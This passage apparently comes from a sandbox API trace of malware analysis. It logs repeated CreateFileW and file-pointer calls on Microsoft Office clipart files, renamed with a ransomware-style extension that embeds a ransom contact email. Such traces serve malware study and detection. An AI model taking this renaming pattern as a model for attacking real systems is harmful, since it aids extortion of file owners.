(in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252629.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252629.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.948] CloseHandle (hObject=0x52c) returned 1 [0165.948] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.949] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252669.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252669.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.949] CloseHandle (hObject=0x52c) returned 1 [0165.950] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.950] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0278702.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0278702.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.950] CloseHandle (hObject=0x52c) returned 1 [0165.951] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.951] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0279644.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0279644.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.953] CloseHandle (hObject=0x52c) returned 1 [0165.955] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.955] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0280468.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0280468.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.955] CloseHandle (hObject=0x52c) returned 1 [0165.956] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.956] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281008.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281008.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.957] CloseHandle (hObject=0x52c) returned 1 [0165.957] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.957] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281243.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281243.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.958] CloseHandle (hObject=0x52c) returned 1 [0165.959] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.959] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281630.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281630.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.959] CloseHandle (hObject=0x52c) returned 1 [0165.960] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.960] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281632.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281632.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.961] CloseHandle (hObject=0x52c) returned 1 [0165.961] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.961] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281638.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281638.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.962] CloseHandle (hObject=0x52c) returned 1 [0165.965] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.965] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281640.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281640.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.965] CloseHandle (hObject=0x52c) returned 1 [0165.966] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.966] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282126.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282126.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.966] CloseHandle (hObject=0x52c) returned 1 [0165.967] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.967] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282928.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282928.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.968] CloseHandle (hObject=0x52c) returned 1 [0165.968] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.968] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282932.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282932.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.969] CloseHandle (hObject=0x52c) returned 1 [0165.970] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.970] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285462.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285462.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.970] CloseHandle (hObject=0x52c) returned 1 [0165.971] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.972] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285484.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285484.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.972] CloseHandle (hObject=0x52c) returned 1 [0165.973] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.973] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285780.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285780.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.973] CloseHandle (hObject=0x52c) returned 1 [0165.974] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.974] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285782.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285782.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.974] CloseHandle (hObject=0x52c) returned 1 [0165.976] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.976] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285792.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285792.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.976] CloseHandle (hObject=0x52c) returned 1 [0165.977] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.977] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285796.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285796.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.977] CloseHandle (hObject=0x52c) returned 1 [0165.978] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.978] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285808.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285808.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.978] CloseHandle (hObject=0x52c) returned 1 [0166.167] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.167] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296277.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296277.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.168] CloseHandle (hObject=0x484) returned 1 [0166.168] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.169] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296279.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296279.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.169] CloseHandle (hObject=0x484) returned 1 [0166.172] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.172] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296288.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296288.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.172] CloseHandle (hObject=0x484) returned 1 [0166.174] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.174] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297229.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297229.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.174] CloseHandle (hObject=0x484) returned 1 [0166.176] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.176] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297269.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297269.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.176] CloseHandle (hObject=0x484) returned 1 [0166.177] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.177] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297725.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297725.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.177] CloseHandle (hObject=0x484) returned 1 [0166.178] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.178] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297727.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297727.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.179] CloseHandle (hObject=0x484) returned 1 [0166.180] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.180] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297757.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297757.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.180] CloseHandle (hObject=0x484) returned 1 [0166.181] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.181] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297759.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297759.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.182] CloseHandle (hObject=0x484) returned 1 [0166.183] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.183] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0300862.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0300862.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.183] CloseHandle (hObject=0x484) returned 1 [0166.184] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.184] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301044.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301044.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.184] CloseHandle (hObject=0x484) returned 1 [0166.185] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.185] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 